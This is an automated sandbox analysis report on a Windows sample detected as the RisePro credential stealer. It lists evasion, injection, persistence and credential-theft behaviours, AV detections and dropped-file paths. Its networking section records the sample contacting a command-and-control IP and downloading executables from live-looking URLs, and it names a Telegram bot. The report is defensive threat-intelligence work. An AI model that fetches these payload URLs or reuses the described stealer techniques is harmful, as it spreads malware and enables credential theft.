Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1426792
MD5: 5fe48966c2f11e09fd518e77118d6b1e
SHA1: 71ac5d567f1485454b0a3b04cece2d40cf8c0fa0
SHA256: f39af57919d6119847e6ecd6a9495fd0b0996a95b0bdf1d2440b6d6f296b1d18
Tags: exe

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Contains functionality to implement multi-threaded time evasion
Contains functionality to inject threads in other processes
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Virustotal: Detection: 80% Perma Link
Source: file.exe ReversingLabs: Detection: 23%
Source: file.exe Virustotal: Detection: 30% Perma Link
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, file.exe, 00000000.00000002.4535204352.000000000059F000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004DB1CB FindFirstFileExW,GetLastError, 0_2_004DB1CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 0_2_0040B300
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CB2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_063CB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06402EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06402EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641CCFD FindFirstFileExW, 0_2_0641CCFD

Networking

Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.6:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.6:49706
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.6:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.6:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.6:49709 -> 193.233.132.175:80
Source: Traffic Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 193.233.132.47:50500 -> 192.168.2.6:49706
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.6:49715
Source: global traffic TCP traffic: 192.168.2.6:49706 -> 193.233.132.47:50500
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Tue, 16 Apr 2024 14:23:25 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 22 Mar 2024 10:03:28 GMTConnection: keep-aliveETag: "65fd5770-45a2b8"Accept-Ranges: bytes
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041E220 recv,setsockopt,recv,WSAGetLastError,recv,recv,setsockopt,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep, 0_2_0041E220
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: file.exe, 00000000.00000002.4548516421.0000000005D30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, 00000000.00000002.4548516421.0000000005D83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exeg
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exeia
Source: file.exe, 00000000.00000002.4548516421.0000000005D83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exey
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000003.3589404399.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4548751165.0000000005F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/:
Source: file.exe, 00000000.00000002.4548751165.0000000005F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/p
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2554170461.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2553437350.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe27
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2554170461.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2553437350.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exeQn%
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2554170461.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2553437350.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4545138703.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4545138703.0000000000E9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.4548516421.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, fAeDYcmqiE_joVxmGjCsOKI.zip.0.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.52
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botO
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
